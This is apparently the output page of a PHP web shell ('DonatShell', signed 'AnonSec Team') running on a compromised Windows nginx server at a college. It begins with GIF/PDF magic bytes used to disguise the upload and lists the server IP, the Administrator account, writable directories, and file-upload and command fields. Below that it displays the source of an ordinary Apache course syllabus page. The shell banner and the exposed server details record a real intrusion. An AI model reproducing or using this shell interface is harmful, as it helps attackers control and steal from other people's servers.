GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/JimMartinson/CST1611/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/JimMartinson/CST1611//Syllabus.php
<?
// CST1611/Syllabus.php

$TRACK = "<b>".basename(__FILE__).'</b> <span class="pv_fl">('.__FILE__.")</span>\n<ol>\n";
ini_set('include_path',ini_get('include_path').PATH_SEPARATOR.$_SERVER['DOCUMENT_ROOT']."/"); // Add the DOCUMENT_ROOT to the include_path.

require('application.phpinc');
require('Course/courseInfo.phpinc');
$title = "Syllabus";
$headTitle = '_CST_ - '.$courseNumber.' '.$courseTitle.' - '.$title;
$pageTitle = $courseNumber.' '.$courseTitle.'<br>'.$title;
$pageMenu = 'Course/courseMenu.phpinc';
require('common/pageHeader.phpinc');

require('classInfo.phpinc');

require('Login/authenticate.phpinc');
$sectionTitle = $courseNumber.' '.$courseTitle.' - '.$title;
require('common/sectionHeader.phpinc');
?>
<p>

<fieldset><legend>Description</legend>
This course covers administration of the Apache web server. The installation and configuration of Apache are covered. This includes site setup, virtual hosts, authentication, content definition, indexing, redirection, logging, security, SSI and CGI. Network administrators and support technicians and are given the skills they need to begin installation and configuration of Apache in a windows environment. This is done through the use of textbook study and hands-on structured lab work assigned by the instructor.
<br>
(Prerequisites: None) (3 Credits) (2 Lecture, 1 Lab, 0 On the Job Training.)
</fieldset>

<fieldset><legend>Objectives</legend>
<ol class="obj">
  <li> Describe yourself, your experience with computer systems, and your future goals.</li>
	<li> Describe why you took this class and your expected class outcomes.</li>
	<!-- Chapter 1 3 -->
	<li>Describe what a web server does.</li>
	<li>Describe how Apache works.</li>
	<!-- Chapter 2 5 -->
	<li>Install Apache web server.</li>
	<li>Configure Apache web server.</li>
	<!-- Chapter 3 7 -->
	<li>Describe the httpd.conf file.</li>
	<li>Describe the mime.types file, and mime types.</li>
	<li>Describe the <b>Allow</b>, <b>AuthDigestFile</b>, <b>AuthGroupFile</b>, <b>AuthName</b>, <b>AuthType</b>, <b>AuthUserFile</b>, <b>Deny</b>, <b>DirectoryIndex</b>, <b>ErrorDocument</b>, <b>Options</b>, <b>Order</b>, <b>Redirect</b>, <b>RedirectMatch</b>, <b>RedirectPermanent</b>, <b>RedirectTemp</b>, <b>Require</b>, <b>RewriteBase</b>, <b>RewriteEngine</b>, <b>RewriteRule</b>, <b>Satisfy</b>, <b>TypesConfig</b>, and <b>User</b> directives.</li>
	<!-- Chapter 4 10 -->
	<li>Configure the OS hosts file.</li>
	<li>Configure a Name-based Virtual Host.</li>
	<li>Configure an IP-based Virtual Host.</li>
	<li>Describe the  <b>Allow</b>, <b>AllowOverride</b>, <b>CustomLog</b>, <b>Deny</b>, <b>&lt;Directory&gt;</b>, <b>DirectoryIndex</b>, <b>DocumentRoot</b>, <b>ErrorLog</b>, <b>Include</b>, <b>NameVirtualHost</b>, <b>Options</b>, <b>Order</b>, <b>ScriptAlias</b>, <b>ServerAdmin</b>, <b>ServerAlias</b>, <b>ServerName</b>, <b>ServerPath</b>, and <b>&lt;VirtualHost</b>&gt; directives.</li>
	<!-- Chapter 5 14 -->
	<li>Describe Apache modules.</li>
	<li>Describe these modules: mod_env, mod_log_config, mod_mime, mod_negotiation, mod_include, mod_autoindex, mod_dir, mod_cgi, mod_asis, mod_imap, mod_actions, mod_userdir, mod_alias, mod_access, mod_auth, mod_setenvif, and mod_rewrite.</li>
	<li>Use Apache modules.</li>
	<!-- Chapter 6 17 -->
	<!-- Chapter 7 -->
	<!-- Chapter 8 -->
</ol>
</fieldset>

<? 
require('ReferencesResources.phpinc');
?>

<fieldset><legend>Requirements</legend>
<fieldset><legend>Lecture Format</legend>
	</fieldset>

An average student will spend <?=$class['totalHours']?> hours performing course tasks: 
<? if ($class['lectureHours'] != 0) { ?><?=$class['lectureHours']?> hours of lecture<?=$lectureHoursPunctuation?><? } ?>
<? if ($class['labHours'] != 0) { ?><?=$class['labHours']?> hours working on assigned tasks in the lab<?=$labHoursPunctuation?><? } ?>
<? if ($class['outsideHours'] != 0) { ?><?=$class['outsideHours']?> hours out-of-class<? } ?>
. Factual information is provided through informal presentation or in a personalized format. The student is expected to contact the instructor if difficulty is encountered or help is needed. Attendance is critical for completion of the lab credits. 
</fieldset>

<fieldset><legend>Grading</legend>
Assignment and quiz grades are totaled and translated to a percentage and the percentages to grades. A score of 70% is passing. The following percentage distribution guarantees the following grade: A:93%+, A-:90%+, B+:87%+, B:83%+, B-:80%+, C+:77%+, C:73%+, C-:70%+, F:&lt;70%.
</fieldset>

</p>
<?
require('Course/DisabilityNotice.phpinc');
require('common/sectionFooter.phpinc');
require('common/pageFooter.phpinc');
if ($TRACK != '') $_SESSION['TRACK'] .= "<li>End ".basename(__FILE__)."</ol>\n";
?>

Anon7 - 2022
AnonSec Team